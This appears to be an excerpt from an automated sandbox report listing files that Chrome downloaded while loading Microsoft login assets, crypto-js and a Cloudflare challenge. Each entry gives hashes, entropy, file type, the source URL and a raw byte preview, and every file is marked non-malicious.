                                                                                                                                                                                                  SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                  MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                  SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                  SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                  SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                                                                                  Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5525
                                                                                                                                                                                                  Entropy (8bit):7.961202222662501
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                                                                                  MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                                                                                  SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                                                                                  SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                                                                                  SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):35170
                                                                                                                                                                                                  Entropy (8bit):7.993096534744333
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                                                                                  MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                                                                                  SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                                                                                  SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                                                                                  SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                                                                                                                  Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):673
                                                                                                                                                                                                  Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):48316
                                                                                                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):3620
                                                                                                                                                                                                  Entropy (8bit):6.867828878374734
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                  MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                  SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                  SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                  SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                                                                                  Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17174
                                                                                                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16378
                                                                                                                                                                                                  Entropy (8bit):7.986541062710992
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                                                                                                                  MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                                                                                                                  SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                                                                                                                  SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                                                                                                                  SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):49954
                                                                                                                                                                                                  Entropy (8bit):7.99493321471063
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                                                                                                                                                  MD5:E16AC075AC754DBD1CF969508220E30D
                                                                                                                                                                                                  SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                                                                                                                                                  SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                                                                                                                                                  SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                                                                                                                                                                                  Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48316
                                                                                                                                                                                                  Entropy (8bit):5.6346993394709
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):61052
                                                                                                                                                                                                  Entropy (8bit):7.996159932827634
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                                                                                  MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                                                                                  SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                                                                                  SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                                                                                  SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                                                                                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:PNG image data, 37 x 56, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                  Entropy (8bit):4.068159130770306
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:yionv//thPlAHtn/Blhsyxl/k4E08up:6v/lhPuJl/7Tp
                                                                                                                                                                                                  MD5:31B377044E94137EB2D3BBB27083668E
                                                                                                                                                                                                  SHA1:DE54A9EE7ED5A7681D493EAB29F987BFBE8F731D
                                                                                                                                                                                                  SHA-256:6D36742C4F6CC2B181549B59A840F78D27060713DD43A8CD8A149B4AD8D148EC
                                                                                                                                                                                                  SHA-512:19151D1537E4FFC0DE00C881824D07976CD042A3D59B8FB53537E28C5BFD1D29DEDF1B57F95028E9E5766048248B06EB5BE0B501ECB749C7D576475B5C6D3348
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/90211ce78d29726b/1736894272349/Y6BOUtUVqa43Gyq
                                                                                                                                                                                                  Preview:.PNG........IHDR...%...8.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                  Entropy (8bit):5.117912766689607
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://login.live.com/Me.htm?v=3
